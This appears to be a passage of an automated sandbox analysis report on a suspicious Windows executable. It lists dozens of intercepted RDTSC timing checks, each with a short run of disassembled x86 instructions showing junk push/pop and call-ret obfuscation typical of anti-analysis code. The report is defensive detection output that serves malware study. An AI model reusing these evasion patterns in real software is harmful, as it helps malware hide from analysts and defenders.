              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1073A66 second address: 1073A7A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F06D851854Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1073A7A second address: 1073AAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F06D8B4D9D8h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1073AAB second address: 1073AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1073AAF second address: 1073AB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1073C06 second address: 1073C0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1073C0A second address: 1073C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1073C13 second address: 1073C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1073C1D second address: 1073C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1073C22 second address: 1073C28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1073C28 second address: 1073C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1073D8D second address: 1073D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1073EBE second address: 1073ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F06D8B4D9C6h 0x0000000a jnl 00007F06D8B4D9C6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1073ECE second address: 1073ED2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1074191 second address: 1074197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1074197 second address: 10741B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F06D8518550h 0x0000000a push ecx 0x0000000b jnc 00007F06D8518546h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 10746F4 second address: 107471B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F06D8B4D9D9h 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F06D8B4D9C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 107471B second address: 107471F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 10749AC second address: 10749C1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F06D8B4D9CBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 10749C1 second address: 10749C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 10749C5 second address: 10749C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 106B72F second address: 106B74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8518559h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 106B74C second address: 106B77C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F06D8B4D9CAh 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 jne 00007F06D8B4D9C6h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 103E5FE second address: 103E606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 103E606 second address: 103E60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 103E60C second address: 103E610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 103E610 second address: 103E62C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F06D8B4D9CCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 107503A second address: 1075044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1075044 second address: 107504A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 107504A second address: 107504E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 107578A second address: 107579D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 107579D second address: 10757A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 10757A1 second address: 10757A7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 107AED7 second address: 107AF03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F06D8518553h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 107AF03 second address: 107AF07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 107B2EE second address: 107B314 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F06D8518550h 0x00000013 jmp 00007F06D851854Ah 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 107B58B second address: 107B5B0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F06D8B4D9D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 107B5B0 second address: 107B5D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518555h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F06D8518546h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 107B5D6 second address: 107B5EE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f push ecx 0x00000010 jo 00007F06D8B4D9CCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 107F297 second address: 107F2A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jnc 00007F06D8518546h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 107F2A4 second address: 107F2B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F06D8B4D9CCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1039674 second address: 1039689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jns 00007F06D8518548h 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 103CB3E second address: 103CB55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F06D8B4D9C6h 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007F06D8B4D9C6h 0x00000011 popad 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 108346E second address: 1083495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F06D8518557h 0x0000000d ja 00007F06D8518552h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 10835F9 second address: 10835FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 10835FF second address: 1083605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1083605 second address: 1083609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1083609 second address: 1083612 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1083612 second address: 108361E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F06D8B4D9C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1083774 second address: 108378D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8518555h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1084580 second address: 1084585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1084585 second address: 108458A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1084686 second address: 1084692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [eax] 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1084692 second address: 1084696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1084696 second address: 108469F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1084C72 second address: 1084C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1084D22 second address: 1084D2C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1084D2C second address: 1084D45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jng 00007F06D8518546h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007F06D8518548h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1084D45 second address: 1084D4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1084D4B second address: 1084D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1084D4F second address: 1084D53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10851BC second address: 10851C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108524E second address: 1085253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1085253 second address: 1085259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1085259 second address: 10852B0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], ebx 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F06D8B4D9C8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 call 00007F06D8B4D9CBh 0x0000002e push eax 0x0000002f sub di, 1E4Ah 0x00000034 pop esi 0x00000035 pop esi 0x00000036 nop 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a jmp 00007F06D8B4D9D1h 0x0000003f push eax 0x00000040 pop eax 0x00000041 popad 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10852B0 second address: 10852DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F06D8518555h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10852DC second address: 10852E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1085511 second address: 1085515 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1085515 second address: 108551B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10856AF second address: 10856B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10856B5 second address: 10856BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1085803 second address: 108580D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F06D8518546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1086DAE second address: 1086DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1087E35 second address: 1087EBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F06D8518548h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 jmp 00007F06D851854Dh 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F06D8518548h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000018h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 push 00000000h 0x00000047 and edi, 62C285E4h 0x0000004d xchg eax, ebx 0x0000004e jmp 00007F06D851854Fh 0x00000053 push eax 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 jne 00007F06D8518546h 0x0000005d rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1088E3A second address: 1088EC8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F06D8B4D9C8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jne 00007F06D8B4D9E3h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F06D8B4D9C8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e adc si, 1BB0h 0x00000033 push 00000000h 0x00000035 cld 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007F06D8B4D9C8h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 00000019h 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 xchg eax, ebx 0x00000053 jp 00007F06D8B4D9D2h 0x00000059 js 00007F06D8B4D9CCh 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1088670 second address: 1088675 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1089860 second address: 10898E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F06D8B4D9C8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 add dword ptr [ebp+122D1E95h], esi 0x0000002d mov dword ptr [ebp+122D577Ah], eax 0x00000033 push 00000000h 0x00000035 pushad 0x00000036 movzx eax, di 0x00000039 or ecx, dword ptr [ebp+122D2947h] 0x0000003f popad 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push eax 0x00000045 call 00007F06D8B4D9C8h 0x0000004a pop eax 0x0000004b mov dword ptr [esp+04h], eax 0x0000004f add dword ptr [esp+04h], 0000001Bh 0x00000057 inc eax 0x00000058 push eax 0x00000059 ret 0x0000005a pop eax 0x0000005b ret 0x0000005c push edi 0x0000005d mov dword ptr [ebp+122D3799h], eax 0x00000063 pop edi 0x00000064 xchg eax, ebx 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 jne 00007F06D8B4D9C6h 0x0000006e rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108B2D2 second address: 108B2DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108B2DA second address: 108B2DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108B879 second address: 108B8FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518550h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F06D8518548h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D3880h], edi 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007F06D8518548h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 or dword ptr [ebp+122D3780h], edx 0x0000004e jo 00007F06D851854Ch 0x00000054 mov dword ptr [ebp+122D1772h], edi 0x0000005a push 00000000h 0x0000005c mov edi, dword ptr [ebp+122D25D5h] 0x00000062 xchg eax, ebx 0x00000063 push esi 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108B8FC second address: 108B930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8B4D9D3h 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f je 00007F06D8B4D9C6h 0x00000015 jmp 00007F06D8B4D9D0h 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108CF39 second address: 108CF3F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108CF3F second address: 108CFAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F06D8B4D9C6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f mov di, dx 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F06D8B4D9C8h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e pushad 0x0000002f and eax, dword ptr [ebp+122D29F3h] 0x00000035 cmc 0x00000036 popad 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push edx 0x0000003c call 00007F06D8B4D9C8h 0x00000041 pop edx 0x00000042 mov dword ptr [esp+04h], edx 0x00000046 add dword ptr [esp+04h], 00000016h 0x0000004e inc edx 0x0000004f push edx 0x00000050 ret 0x00000051 pop edx 0x00000052 ret 0x00000053 or esi, 3A5567D4h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push ebx 0x0000005d pushad 0x0000005e popad 0x0000005f pop ebx 0x00000060 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108CC96 second address: 108CC9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
